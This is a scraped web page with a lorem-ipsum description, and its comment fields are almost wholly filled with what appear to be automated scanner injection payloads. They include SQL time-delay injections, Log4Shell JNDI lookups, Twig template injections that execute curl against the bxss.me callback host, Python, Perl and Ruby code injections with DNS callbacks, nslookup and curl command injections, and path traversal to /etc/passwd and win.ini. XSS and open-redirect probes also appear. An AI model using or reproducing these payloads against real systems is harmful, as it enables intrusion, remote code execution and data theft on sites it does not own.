Descrição
Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.





















1 –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitbabeqummokb4112${::-.}bxss.me}zzzz${url:UTF-8:http://hitixtnpxkaqi.bxss.me/} –
555
1 –
12345′”\’\”);|]*{
”
1 –
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitiagignrxik93657.”+”bxss.me”)+’
1′”()&BH(9584) –
555
1 –
555
1 –
555′”
1L72Q6NLQ0 –
555
1 –
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.195432.2754-27750.2754.44bda${::-.}1${::-.}bxss.me}}
1javascript:/* –
555
1 –
555
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hittshwdogznwde2c3.’+’bxss.me’)+” –
555
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) –
555
1 –
echo okfgkf$()\ hqgzri\nz^xyu||a #’ &echo okfgkf$()\ hqgzri\nz^xyu||a #|” &echo okfgkf$()\ hqgzri\nz^xyu||a #
1 –
555
wp-comments-post.php –
555
1otKZjd2G –
555
1*1 –
555
-1 OR 5*5=25 — –
555
-1′) OR 5*5=25 — –
555
1*if(now()=sysdate(),sleep(15),0) –
555
10’XOR(1*if(now()=sysdate(),sleep(15),0))XOR’Z –
555
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/ –
555
1-1; waitfor delay ‘0:0:15’ — –
555
1-1); waitfor delay ‘0:0:15’ — –
555
1′”()&%8Yai(9126) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitilrwxpahmg57c10.bxss.me”)}} –
555
19454288 –
555
Anônimo –
555
1}}”}}’}}1%>”%>’%> –
555
dfb{{98991*97996}}xca –
555
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”) –
555
1-1)) OR 221=(SELECT 221 FROM PG_SLEEP(15))– –
555
1kqnXVC4k’ OR 627=(SELECT 627 FROM PG_SLEEP(15))– –
555
1fenxoJ4W’) OR 818=(SELECT 818 FROM PG_SLEEP(15))– –
555
1Be82Dman’)) OR 996=(SELECT 996 FROM PG_SLEEP(15))– –
555
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’ –
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual) –
555
1′”()&%SXy4(9117) –
555
1 –
555S2yl7bId
1 –
555*1
1 –
555*711*706*0
1 –
-1 OR 5*5=25
1 –
-1″ OR 5*5=25 —
1 –
555*if(now()=sysdate(),sleep(15),0)
1 –
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
1 –
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
1 –
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1 –
555
1 –
555-1); waitfor delay ‘0:0:15’ —
1 –
555-1 waitfor delay ‘0:0:15’ —
1 –
555vRpAbrjh’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 428=(SELECT 428 FROM PG_SLEEP(15))–
1 –
555-1) OR 966=(SELECT 966 FROM PG_SLEEP(15))–
1 –
555c0IPbH4r’)) OR 972=(SELECT 972 FROM PG_SLEEP(15))–
1 –
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1 –
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1 –
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
1 –
555
1 –
555
1′”()&%9J1F(9216) –
555
19077392 –
555
1}}”}}’}}1%>”%>’%> –
555
dfb[[${98991*97996}]]xca –
555
1′”()&%wM6l(9533) –
555
1′”()&%Uvi2(9223) –
555
1′”()&%jz5i(9295) –
555
response.write(9863157*9909222) –
555
1PBR7GB8D0 –
555
1′” –
555
Anônimo –
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg –
555
1 –
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
‘.gethostbyname(lc(‘hitdq’.’ifaawywc4a463.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(108).chr(84).chr(118).chr(86).’ –
555
1 –
‘.gethostbyname(lc(‘hitxj’.’xokluevp98abb.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(108).chr(86).chr(107).chr(88).’
wp-comments-post.php/. –
555
xfs.bxss.me –
555
19010884 –
555
bfg9175<s1﹥s2ʺs3ʹhjl9175 –
555
1}}”}}’}}1%>”%>’%> –
555
dfb__${98991*97996}__::.x –
555
Anônimo –
555
1}}”}}’}}1%>”%>’%> –
555
1 –
555′”()&%Nbvz(9111)
1 –
5559371815
1 –
bfg5416<s1﹥s2ʺs3ʹhjl5416
1 –
1}}”}}’}}1%>”%>’%>
1 –
dfb[[${98991*97996}]]xca
1 –
bfg6537<s1﹥s2ʺs3ʹhjl6537
1 –
1 –
dfb__${98991*97996}__::.x
1 –
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
1 –
555
1 –
555
1′”()&%iMP1(9858) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitjxufvdlzgo4dd13.bxss.me”)}} –
555
‘”()&%iMP1(9791) –
555
19892760 –
555
bfg9319<s1﹥s2ʺs3ʹhjl9319 –
555
Anônimo –
555
1}}”}}’}}1%>”%>’%> –
555
1iMP1(9985) –
555
1GZMGO[!+!] –
555
1iMP1(9422) –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitqwwcxtugfk76fc1${::-.}bxss.me}zzzz${url:UTF-8:http://hitijukqpievg.bxss.me/} –
555
echo gsmial$()\ idhlzo\nz^xyu||a #’ &echo gsmial$()\ idhlzo\nz^xyu||a #|” &echo gsmial$()\ idhlzo\nz^xyu||a # –
555
1 –
0v8TnkDC: TkrSzNNK
1 –
../../../../../../../../../../../../../../etc/passwd
1&n914776=v956501 –
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’)); –
555
1 –
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitjlsqanartp5f40a.’+’bxss.me’)+”
1 –
555
1 –
‘”
1 –
5559133249
1 –
\
1 –
dfb{98991*97996}xca
1′”()&%M2yO(9426) –
555
1 –
dfb{@98991*97996}xca
1 –
dfbxca
1 –
print(“dfb” . 98991*97996 . “xca”);
1 –
dfb{{{this}}}xca
1 –
dfb{{‘abcd’.toUpperCase()}}xca
1 –
dfb{{98991*97996}}xca
1 –
bfg10065<s1﹥s2ʺs3ʹhjl10065
1 –
1 –
555
1′”()&%jyST(9692) –
555
1′”()&%lqHB(9824) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitysvmghhcyu54216.bxss.me”)}} –
555
‘”()&%lqHB(9220) –
555
1 –
555
1′”()&%EOPS(9603) –
555
19885879 –
555
Anônimo –
555
1}}”}}’}}1%>”%>’%> –
555
1′”()&6l(9411) –
555
19148636 –
555
1′”()&%O3ZZ(9093) –
555
‘”()&%O3ZZ(9711) –
555
19931886 –
555
Anônimo –
555
1}}”}}’}}1%>”%>’%> –
555
1′”()&%ke0p(9071) –
555
‘”()&%ke0p(9010) –
555
19566125 –
555
1}}”}}’}}1%>”%>’%> –
555
1ke0p(9717) –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hithmafhqvtdqcc117${::-.}bxss.me}zzzz${url:UTF-8:http://hitzqakiwxzth.bxss.me/} –
555
response.write(9405839*9468408) –
555
Xn7wTk2I –
555
1D7W9OkMC –
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg –
555
1*67*62*0 –
555
1*773*768*0 –
555
1 –
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitczdfhzbjva34e51.”+”bxss.me”)+’
http://hitvpzdbaqdcn.bxss.me/ –
555
1 –
xfs.bxss.me
‘” –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hiteriomowmfue1e98.bxss.me”)}} –
555
1 –
555′”()&%q64d(9441)
10″XOR(1*if(now()=sysdate(),sleep(15),0))XOR”Z –
555
1 –
555
1-1 waitfor delay ‘0:0:15’ — –
555
12ct2gMyf’; waitfor delay ‘0:0:15’ — –
555
1-1) OR 553=(SELECT 553 FROM PG_SLEEP(15))– –
555
1-1)) OR 711=(SELECT 711 FROM PG_SLEEP(15))– –
555
1NwVedTTJ’ OR 652=(SELECT 652 FROM PG_SLEEP(15))– –
555
1vK91rkkV’) OR 541=(SELECT 541 FROM PG_SLEEP(15))– –
555
1p2NSPw1U’)) OR 486=(SELECT 486 FROM PG_SLEEP(15))– –
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) –
555
Anônimo –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitmlqzhjaasy36625.bxss.me”)}} –
555
19237127 –
555
bfg1133<s1﹥s2ʺs3ʹhjl1133 –
555
1}}”}}’}}1%>”%>’%> –
555
1 –
555PcmpAtww
1 –
555*900*895*0
1 –
555*839*834*0
1 –
555*698*693*0
1 –
555+703-698-5
1 –
-1′ OR 5*5=25 —
1 –
-1′) OR 5*5=25 —
1 –
-1′)) OR 5*5=25 —
1 –
555-1; waitfor delay ‘0:0:15’ —
1 –
555ujEQ5cah’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 763=(SELECT 763 FROM PG_SLEEP(15))–
1 –
555-1) OR 706=(SELECT 706 FROM PG_SLEEP(15))–
1 –
555-1)) OR 314=(SELECT 314 FROM PG_SLEEP(15))–
1 –
555uJxteJTp’ OR 712=(SELECT 712 FROM PG_SLEEP(15))–
1 –
555AXE4Al8n’) OR 471=(SELECT 471 FROM PG_SLEEP(15))–
1 –
555HeFwY4FJ’)) OR 386=(SELECT 386 FROM PG_SLEEP(15))–
1 –
555%2527%2522\’\”
1′”()&%1uCA(9809) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitcsyhgtctyhf77e5.bxss.me”)}} –
555
‘”()&%1uCA(9469) –
555
1′”()&%kxCF(9857) –
555
1 –
555
1′”()&%h5B7(9422) –
555
1′”()&%nuiA(9559) –
555
1′”()&%cjeY(9835) –
555
‘”()&%cjeY(9933) –
555
19512492 –
555
dfb{98991*97996}xca –
555
dfb{@98991*97996}xca –
555
dfb{{“abc”|title}}xca –
555
print(“dfb” . 98991*97996 . “xca”); –
555
dfb#{xca}=123 –
555
bfg10957<s1﹥s2ʺs3ʹhjl10957 –
555
1}}”}}’}}1%>”%>’%> –
555
1cjeY(9135) –
555
1YUQ5A[!+!] –
555
19758″();}]9987 –
555
1′”()&%6LnL(9916) –
555
1′”()&%l1Gy(9420) –
555
1′”()&%BRDI(9555) –
555
19105885 –
555
bfg1790<s1﹥s2ʺs3ʹhjl1790 –
555
1}}”}}’}}1%>”%>’%> –
555
bfg8395<s1﹥s2ʺs3ʹhjl8395 –
555
1}}”}}’}}1%>”%>’%> –
555
1′”()&%Bxkx(9967) –
555
rsvCKCrv: ZBwQRc95 –
555
1 –
http://bxss.me/t/xss.html?%00
1 –
555
1 –
555
1X7NVuT0k –
555
1 –
5559129464
1 –
\
-1′)) OR 5*5=25 — –
555
1 –
dfbxca
1 –
bfg4962<s1﹥s2ʺs3ʹhjl4962
1 –
1}}”}}’}}1%>”%>’%>
ndjgTHBM –
555
1 –
5559037266
1 –
\
1 –
dfb${98991*97996}xca
1 –
dfb{{=98991*97996}}xca
1 –
dfb{{“abc”|title}}xca
1 –
#{98991*97996*98991*97996}
1 –
bfg1343<s1﹥s2ʺs3ʹhjl1343
1 –
1}}”}}’}}1%>”%>’%>
15RYZX5BE0 –
555
1 –
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1 –
“+”A”.concat(70-3).concat(22*4).concat(102).concat(68).concat(102).concat(75)+(require”socket”
Socket.gethostbyname(“hitaf”+”fymzuewa7f6a1.bxss.me.”)[3].to_s)+”
1′”()&%7OMG(9059) –
555
1′”()&%l7RE(9175) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitvirvzaonrtd19a7.bxss.me”)}} –
555
19103790 –
555
bfg6256<s1﹥s2ʺs3ʹhjl6256 –
555
1′”()&%wTMv(9282) –
555
dfb#{98991*97996}xca –
555
dfb{#98991*97996}xca –
555
dfb{{=98991*97996}}xca –
555
dfbxca –
555
dfb#set($x=98991*97996)${x}xca –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hityawozuvxfb6148d${::-.}bxss.me}zzzz${url:UTF-8:http://hitlrikvganhr.bxss.me/} –
555
dfb{{{this}}}xca –
555
${10000175+9999413} –
555
1 –
redirtest.acx
http://hithbkjgocvnw.bxss.me/ –
555
1 –
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitjpptesuydbe8189.bxss.me”)}}
1 –
555ZjcdAtoz
1 –
555*380*375*0
1 –
555*727*722*0
1 –
5557n3WxIKR’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 447=(SELECT 447 FROM PG_SLEEP(15))–
1 –
555-1) OR 100=(SELECT 100 FROM PG_SLEEP(15))–
1 –
555-1)) OR 590=(SELECT 590 FROM PG_SLEEP(15))–
1 –
555qjyJONad’ OR 479=(SELECT 479 FROM PG_SLEEP(15))–
1 –
555N0DySegN’) OR 591=(SELECT 591 FROM PG_SLEEP(15))–
1 –
555GC54nRe4′)) OR 890=(SELECT 890 FROM PG_SLEEP(15))–
1′”()&%6S5W(9133) –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitjvwejidcegae183${::-.}bxss.me}zzzz${url:UTF-8:http://hitkyufnfrmyk.bxss.me/} –
555
1 –
echo dlcbmf$()\ rptcsj\nz^xyu||a #’ &echo dlcbmf$()\ rptcsj\nz^xyu||a #|” &echo dlcbmf$()\ rptcsj\nz^xyu||a #
1 –
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.197238.42-6422.42.b5120${::-.}1${::-.}bxss.me}}
1 –
DuoLASao: RDvoQ02K
1 –
555
) –
555
1 –
‘.gethostbyname(lc(‘hitbj’.’kmxxnruld91a0.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(107).chr(83).chr(122).chr(66).’
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitxdcttgdivg0ca70.’+’bxss.me’)+” –
555
1 –
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hittwugywevsg3dfef.’+’bxss.me’)+”
http://hitobhitgoxsn.bxss.me/ –
555
1 –
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
163N66ZPH0 –
555
redirtest.acx –
555
http://hitacjnelpmju.bxss.me/ –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitbqordogiwr46e73.bxss.me”)}} –
555
1′”()&%Jx3L(9411) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hittsdixttusk34e7f.bxss.me”)}} –
555
19658447 –
555
bfg1489<s1﹥s2ʺs3ʹhjl1489 –
555
1}}”}}’}}1%>”%>’%> –
555
1′”()&%FKH0(9530) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitcromfvvfff2cabc.bxss.me”)}} –
555
${j${::-n}di:dns${::-:}${::-/}${::-/}hitqmnnuxntvn552fb${::-.}bxss.me}zzzz${url:UTF-8:http://hitapuzkdtqcf.bxss.me/} –
555
1 –
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.197238.356-9503.356.87d9d${::-.}1${::-.}bxss.me}}
1 –
)
http://bxss.me/t/rfi.php? –
555
‘{“ –
555
1 –
5555UrDnWRQ
1 –
555*969*964*0
1 –
555*608*603*0
1 –
555K3mwR4wS’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 415=(SELECT 415 FROM PG_SLEEP(15))–
1 –
555-1) OR 888=(SELECT 888 FROM PG_SLEEP(15))–
1 –
555-1)) OR 213=(SELECT 213 FROM PG_SLEEP(15))–
1 –
555SWQF8yls’ OR 826=(SELECT 826 FROM PG_SLEEP(15))–
1 –
555P4ohpcmO’) OR 214=(SELECT 214 FROM PG_SLEEP(15))–
1 –
555keXUz6uL’)) OR 190=(SELECT 190 FROM PG_SLEEP(15))–
1′”()&%eVwe(9982) –
555
1 –
@@h8mET
1′”()&%Ssmp(9990) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hithsxhagdapk031b9.bxss.me”)}} –
555
1′”()&%aG4r(9169) –
555
1′”()&%gsG4(9906) –
555
‘”()&%gsG4(9588) –
555
1′”()&%u0jO(9215) –
555
‘”()&%u0jO(9051) –
555
response.write(9318897*9588630) –
555
1 –
‘”()
1 –
wp-comments-post.php
1′”()&%yiCJ(9114) –
555
1 –
5557iM66W3t
1′”()&AH(9503) –
555
1 –
555*591*586*0
1 –
555XZfLe39l’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 924=(SELECT 924 FROM PG_SLEEP(15))–
1 –
555-1) OR 782=(SELECT 782 FROM PG_SLEEP(15))–
1 –
555-1)) OR 388=(SELECT 388 FROM PG_SLEEP(15))–
1 –
5558SBjbcPX’ OR 838=(SELECT 838 FROM PG_SLEEP(15))–
1 –
555ThwozHcm’) OR 804=(SELECT 804 FROM PG_SLEEP(15))–
1 –
555KcQW4wFi’)) OR 95=(SELECT 95 FROM PG_SLEEP(15))–
1 –
@@xLZWk
wrBEIRqX wrBEIRqX –
555
1 –
TqxRCUQm
1 –
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitluocfmwfvv0b593.”+”bxss.me”)+’ –
555
1 –
555″||sleep(27*1000)*thlzml||”
“+”A”.concat(70-3).concat(22*4).concat(113).concat(85).concat(114).concat(83)+(require”socket” Socket.gethostbyname(“hittu”+”zrfkeunbf5863.bxss.me.”)[3].to_s)+” –
555
1′”()&%nmIB(9394) –
555
1 –
5559503169
1 –
1 –
<th:t="${dfb}#foreach
1 –
1}}”}}’}}1%>”%>’%>
1 –
bfg9608<s1﹥s2ʺs3ʹhjl9608
1 –
bfgx4593z1z2abcxhjl4593
1 –
1 –
<th:t="${dfb}#foreach
1′”()&Ir(9866) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitfwtayohsrkd3a7f.bxss.me”)}} –
555
‘”()&Ir(9318) –
555
19347533 –
555
bfg10050<s1﹥s2ʺs3ʹhjl10050 –
555
1}}”}}’}}1%>”%>’%> –
555
1FcIr(9150) –
555
1BWPRU[!+!] –
555
1FcIr(9864) –
555
1FcIr(9763)9763 –
555
1FcIr(9805) –
555
1FcIr(9348) –
555
1FcIr(9388) –
555
9474 –
555
1\u003CScRiPt\FcIr(9303)\u003C/sCripT\u003E –
555
1<ScRiPt>FcIr(9789)</sCripT> –
555
1}body{zzz:Expre/**/SSion(FcIr(9412))} –
555
1K8oPf FcIr(9931) –
555
1IV55U[!+!] –
555
1′”()&%Ynk3(9055) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitsgzvjvmzft12487.bxss.me”)}} –
555
19916655 –
555
bfg10373<s1﹥s2ʺs3ʹhjl10373 –
555
1}}”}}’}}1%>”%>’%> –
555
1′>”> –
555
1 –
555&n928661=v946010
1 –
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
1 –
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitxnsbautqpvd37d3.”+”bxss.me”)+’
1 –
‘”>
1 –
‘{“
1 –
555TAnIB5LU
1 –
555*68*63*0
1 –
555*503*498*0
1 –
555djRPrX0g’; waitfor delay ‘0:0:15’ —
1 –
555-1 OR 368=(SELECT 368 FROM PG_SLEEP(15))–
1 –
555-1) OR 40=(SELECT 40 FROM PG_SLEEP(15))–
1 –
555-1)) OR 950=(SELECT 950 FROM PG_SLEEP(15))–
1′”()&%Wwbt(9120) –
555
19449395 –
555
1}}”}}’}}1%>”%>’%> –
555
1 –
555I2Iv4rEh’) OR 505=(SELECT 505 FROM PG_SLEEP(15))–
1 –
555NRgBOZkr’)) OR 802=(SELECT 802 FROM PG_SLEEP(15))–
pHqghUme –
555
pHqghUmeRVP8V7Z9 –
555
&(nslookup -q=cname hitfpzenlfpdc24fed.bxss.me||curl hitfpzenlfpdc24fed.bxss.me)&’\”`0&(nslookup -q=cname hitfpzenlfpdc24fed.bxss.me||curl hitfpzenlfpdc24fed.bxss.me)&`’ –
555
../../../../../../../../../../../../../../etc/shells –
555
HttP://bxss.me/t/xss.html? –
555
pHqghUme –
‘A’.concat(70-3).concat(22*4).concat(109).concat(70).concat(110).concat(81)+(require’socket’
Socket.gethostbyname(‘hitlp’+’fpnwupkk821cc.bxss.me.’)[3].to_s)
pHqghUme'”()&%xwoH(9126) –
555
1PX7DX48M0 –
555
../../../../../../../../../../../../../../etc/passwd –
555
pHqghUme54vyBrPp –
555
../../../../../../../../../../../../../../windows/win.ini –
555
pHqghUme’ AND 2*3*8=6*8 AND ‘nU0g’=’nU0g –
555
file:///etc/passwd –
555
pHqghUme –
12345′”\’\”);|]*{
”
pHqghUme” AND 2*3*8=6*8 AND “LTyQ”=”LTyQ –
555
../pHqghUme –
555
pHqghUme –
555
pHqghUme –
${j${::-n}di:dns${::-:}${::-/}${::-/}hitftwpuokmnbc3fe3${::-.}bxss.me}zzzz${url:UTF-8:http://hitxfhkgchcak.bxss.me/}
./pHqghUme –
555
${9999999+9999502} –
555
pHqghUme –
‘”><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitaerhbrwxtya725b${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
pHqghUme –
../../../../../../../../../../../../../../etc/passwd
pHqghUme –
${10000353+9999523}
pHqghUme –
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}${::-/}dns.log4j.197220.168-2353.168.1b6fa${::-.}1${::-.}bxss.me}}
pHqghUme –
../../../../../../../../../../../../../../windows/win.ini
redirtest.acx?pHqghUme –
555
‘.gethostbyname(lc(‘hitip’.’aocsxgsl324cc.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(101).chr(76).chr(122).chr(80).’ –
555
str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hituikiyjimth9f4da.’+’bxss.me’) –
555
pHqghUme –
redirtest.acx
Http://bxss.me/t/fit.txt –
555
‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hituikiyjimth9f4da.”+”bxss.me”)+’ –
555
pHqghUme –
https://warner.ie/
&nslookup -q=cname hitjpcwkvwshsfa98d.bxss.me&’\”`0&nslookup -q=cname hitjpcwkvwshsfa98d.bxss.me&`’ –
555
“+str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hituikiyjimth9f4da.’+’bxss.me’)+” –
555
pHqghUme –
https://bxss.me/
pHqghUme –
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
pHqghUme –
str(__import__(‘time’).sleep(9))+__import__(‘socket’).gethostbyname(‘hitvphzzwbmeo18e82.’+’bxss.me’)
pHqghUme –
https://warner.ie.bxss.me/
pHqghUme –
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
pHqghUme –
https://warner.ie@bxss.me/
pHqghUme –
/etc/shells
pHqghUme –
wp-comments-post.php
pHqghUme –
https://warner.ie:80@bxss.me/
pHqghUme –
../../../../../../../../../../../../../../etc/shells
pHqghUme –
wp-comments-post.php/.
pHqghUme –
https://bxss.me\@warner.ie/
pHqghUme –
c:/windows/win.ini
‘”> –
555
pHqghUme –
https://bxss.me#warner.ie/
pHqghUme –
bxss.me
pHqghUme –
‘”>
pHqghUme –
https://bxss.me?warner.ie/
pHqghUme –
http://bxss.me/t/fit.txt
pHqghUme –
‘+’A’.concat(70-3).concat(22*4).concat(121).concat(82).concat(104).concat(67)+(require’socket’
Socket.gethostbyname(‘hitdf’+’pqfslrusdbc74.bxss.me.’)[3].to_s)+’
pHqghUme –
@bxss.me/
pHqghUme –
http://bxss.me/t/fit.txt?.jpg
pHqghUme –
‘A’.concat(70-3).concat(22*4).concat(117).concat(81).concat(108).concat(71)+(require’socket’
Socket.gethostbyname(‘hitte’+’igsuhyvmcc15a.bxss.me.’)[3].to_s)
pHqghUme –
https://bxss.me?555
pHqghUme –
555&echo ezyrpv$()\ vdwash\nz^xyu||a #’ &echo ezyrpv$()\ vdwash\nz^xyu||a #|” &echo ezyrpv$()\ vdwash\nz^xyu||a #
pHqghUme –
<!–
pHqghUme –
|echo qbnmdz$()\ syhhco\nz^xyu||a #’ |echo qbnmdz$()\ syhhco\nz^xyu||a #|” |echo qbnmdz$()\ syhhco\nz^xyu||a #
pHqghUme –
//bxss.me/warner.ie/
pHqghUme –
555|echo befucb$()\ gamwkd\nz^xyu||a #’ |echo befucb$()\ gamwkd\nz^xyu||a #|” |echo befucb$()\ gamwkd\nz^xyu||a #
pHqghUme –
http:bxss.me
pHqghUme –
https:\\bxss.me\
pHqghUme –
/\bxss.me/
pHqghUme –
/\/bxss.me/
pHqghUme –
&nslookup -q=cname hitwhoduomxgf5790a.bxss.me&’\”`0&nslookup -q=cname hitwhoduomxgf5790a.bxss.me&`’
pHqghUme –
\\bxss.me
pHqghUme –
%2f%2fbxss.me%2f
pHqghUme –
//bxss.me/?555
pHqghUme –
https://bxss.me?https://warner.ie/
pHqghUme –
555*1
pHqghUme –
555*174*169*0
pHqghUme –
555+179-174-5
pHqghUme –
-1 OR 5*5=25 —
pHqghUme –
-1′ OR 5*5=26 —
pHqghUme –
-1′) OR 5*5=26 —
pHqghUme –
-1′) OR 3*2>999 —
pHqghUme –
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
pHqghUme –
555-1; waitfor delay ‘0:0:15’ —
pHqghUme'”()&%VeMl(9919) –
555
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitybgsvnqvjbbe993.bxss.me”)}} –
555
pHqghUme –
555-1) OR 988=(SELECT 988 FROM PG_SLEEP(15))–
pHqghUme –
555-1)) OR 170=(SELECT 170 FROM PG_SLEEP(15))–
pHqghUme –
555vHVlhQ2a’ OR 388=(SELECT 388 FROM PG_SLEEP(15))–
pHqghUme –
555UrsmX9Xx’) OR 604=(SELECT 604 FROM PG_SLEEP(15))–
pHqghUme –
555VqjkVDr8′)) OR 624=(SELECT 624 FROM PG_SLEEP(15))–
pHqghUme –
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme –
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
pHqghUme –
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
pHqghUme –
555′”
pHqghUme'”()&%X55d(9906) –
555
pHqghUme –
555%2527%2522\’\”
{{_self.env.registerUndefinedFilterCallback(“system”)}}{{_self.env.getFilter(“curl hitvzcycxmxbyf9be9.bxss.me”)}} –
555
pHqghUme –
@@ww36M
‘”()&%X55d(9581) –
555
pHqghUme –
(select 198766*667891)
pHqghUmeuZLylLH3 –
555
pHqghUme’ AND 2*3*8=6*8 AND ‘gQuE’=’gQuE –
555
pHqghUme” AND 2*3*8=6*8 AND “OR4u”=”OR4u –
555
pHqghUme –
file:///etc/passwd
echo jouapj$()\ ioogvz\nz^xyu||a #’ &echo jouapj$()\ ioogvz\nz^xyu||a #|” &echo jouapj$()\ ioogvz\nz^xyu||a # –
555
pHqghUme%’ AND 2*3*8=6*8 AND ‘GYF8’!=’GYF8% –
555
pHqghUme –
../555
&echo duzlzv$()\ aenumo\nz^xyu||a #’ &echo duzlzv$()\ aenumo\nz^xyu||a #|” &echo duzlzv$()\ aenumo\nz^xyu||a # –
555
-1 OR 5*5=25 –
555
pHqghUme –
./555
|echo vgvfzm$()\ swclys\nz^xyu||a #’ |echo vgvfzm$()\ swclys\nz^xyu||a #|” |echo vgvfzm$()\ swclys\nz^xyu||a # –
555
-1 OR 5*5=26 –
555
pHqghUme&n900462=v991492 –
555
-1′ OR 5*5=25 — –
555
pHqghUme –
555&n922539=v925504
(nslookup -q=cname hitkjssgojgzq6e2fe.bxss.me||curl hitkjssgojgzq6e2fe.bxss.me)) –
555
-1′ OR 5*5=26 — –
555
“;print(md5(31337));$a=” –
555
